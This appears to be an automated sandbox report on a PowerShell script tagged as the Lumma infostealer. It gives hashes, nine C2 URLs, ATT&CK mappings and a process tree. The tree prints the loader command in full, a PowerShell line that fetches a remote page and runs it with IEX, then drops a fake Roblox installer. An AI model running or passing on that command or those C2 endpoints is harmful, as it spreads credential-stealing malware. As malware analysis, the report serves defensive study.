lumma | d6b7aa881e985ed851187c9cc31f2b52f0eda6154477fdc7b7dde6c47b895aae

General

Target

NoEjecutar.ps1
Size

771B
MD5

cff24ce87e9d24dead0de72ebca8b923
SHA1

079265dd80f631c53fe34d688f6eeb0d52f8a6ae
SHA256

d6b7aa881e985ed851187c9cc31f2b52f0eda6154477fdc7b7dde6c47b895aae
SHA512

c6c4cf566ceb3d600efc84c49b5bf449f84f9eb4fe870d71c57cc3448538fb12017f702cb3854305bbb111e394d7150fd8b41778a102bbf1b1d90e97c9109202

Score

10^/10

lumma execution stealer

Malware Config

Extracted

Family

lumma

C2

https://discoverymaidykew.shop/api

https://publicitycharetew.shop/api

https://computerexcudesp.shop/api

https://leafcalfconflcitw.shop/api

https://injurypiggyoewirog.shop/api

https://bargainnygroandjwk.shop/api

https://disappointcredisotw.shop/api

https://doughtdrillyksow.shop/api

https://facilitycoursedw.shop/api

Signatures

Lumma Stealer
An infostealer written in C++ first seen in August 2022.
stealer lumma

Blocklisted process makes network request 1 IoCs

flow	pid	Process
8	3416	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2860	powershell.exe
3416	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
1536	RobloxPlayerInstaller.exe

Gathers network information 2 TTPs 1 IoCs

Uses commandline utility to view network configuration.

System Information Discovery

T1082

Command and Scripting Interpreter

T1059

pid	Process
4040	ipconfig.exe

Suspicious behavior: EnumeratesProcesses 6 IoCs

pid	Process
2860	powershell.exe
2860	powershell.exe
3416	powershell.exe
3416	powershell.exe
1536	RobloxPlayerInstaller.exe
1536	RobloxPlayerInstaller.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2860	powershell.exe
Token: SeDebugPrivilege	3416	powershell.exe

Suspicious use of WriteProcessMemory 7 IoCs

description	pid	Process	procid_target
PID 2860 wrote to memory of 4040	2860	powershell.exe	83
PID 2860 wrote to memory of 4040	2860	powershell.exe	83
PID 2860 wrote to memory of 3416	2860	powershell.exe	84
PID 2860 wrote to memory of 3416	2860	powershell.exe	84
PID 3416 wrote to memory of 1536	3416	powershell.exe	97
PID 3416 wrote to memory of 1536	3416	powershell.exe	97
PID 3416 wrote to memory of 1536	3416	powershell.exe	97

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\NoEjecutar.ps1
1⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2860
- C:\Windows\system32\ipconfig.exe
  "C:\Windows\system32\ipconfig.exe" /flushdns
  2⤵
  - Gathers network information
  PID:4040
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $g91F = 'https://flynews.us/hell/you/goback.html' $v38K = @{ 'User-Agent' = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0 Safari/537.36' } $z04Q = Invoke-WebRequest -Uri $g91F -UseBasicParsing -Headers $v38K $content = $z04Q.Content IEX $content clear-host ; Set-Clipboard -Value " ";
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3416
- - C:\Users\Admin\AppData\Local\Temp\bszJabGF\RobloxPlayerInstaller.exe
    "C:\Users\Admin\AppData\Local\Temp\bszJabGF\RobloxPlayerInstaller.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    PID:1536

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

2

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
6cf293cb4d80be23433eecf74ddb5503

SHA1
24fe4752df102c2ef492954d6b046cb5512ad408

SHA256
b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8

SHA512
0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
50a8221b93fbd2628ac460dd408a9fc1

SHA1
7e99fe16a9b14079b6f0316c37cc473e1f83a7e6

SHA256
46e488628e5348c9c4dfcdeed5a91747eae3b3aa49ae1b94d37173b6609efa0e

SHA512
27dda53e7edcc1a12c61234e850fe73bf3923f5c3c19826b67f2faf9e0a14ba6658001a9d6a56a7036409feb9238dd452406e88e318919127b4a06c64dba86f0

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_dfkor2c3.wur.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\bszJabGF\RobloxPlayerInstaller.exe

Filesize
5.7MB

MD5
c484a17ffc8468f2815c0798a53427b8

SHA1
a73a6fe8d32cfead5b39073488e3d161fb0df1ef

SHA256
a65dd1ed5b9c447a7e3e2dab559478e5fb3ad7a610152c1792fd4b1f4b3a7290

SHA512
be82caf808a70746f6bc95401536229643ee5d22f0d5689d2e6207191d5593b67890e46fc462de9ba24f897c01ef701b9bd78cd20cb65893544cb2c9053c196d

Download Submit
memory/1536-50-0x0000000003700000-0x0000000003751000-memory.dmp

Filesize
324KB

Download
memory/1536-48-0x0000000003700000-0x0000000003751000-memory.dmp

Filesize
324KB

Download
memory/2860-10-0x000001B6613B0000-0x000001B6613D2000-memory.dmp

Filesize
136KB

Download
memory/2860-11-0x00007FFB079B0000-0x00007FFB08471000-memory.dmp

Filesize
10.8MB

Download
memory/2860-12-0x00007FFB079B0000-0x00007FFB08471000-memory.dmp

Filesize
10.8MB

Download
memory/2860-15-0x00007FFB079B0000-0x00007FFB08471000-memory.dmp

Filesize
10.8MB

Download
memory/2860-0-0x00007FFB079B3000-0x00007FFB079B5000-memory.dmp

Filesize
8KB

Download
memory/3416-18-0x00007FFB079B0000-0x00007FFB08471000-memory.dmp

Filesize
10.8MB

Download
memory/3416-32-0x000001BE16BF0000-0x000001BE16BFA000-memory.dmp

Filesize
40KB

Download
memory/3416-31-0x000001BE2FDE0000-0x000001BE2FDF2000-memory.dmp

Filesize
72KB

Download
memory/3416-46-0x00007FFB079B0000-0x00007FFB08471000-memory.dmp

Filesize
10.8MB

Download
memory/3416-19-0x00007FFB079B0000-0x00007FFB08471000-memory.dmp

Filesize
10.8MB

Download
memory/3416-17-0x00007FFB079B0000-0x00007FFB08471000-memory.dmp

Filesize
10.8MB

Download

Analysis

Sharing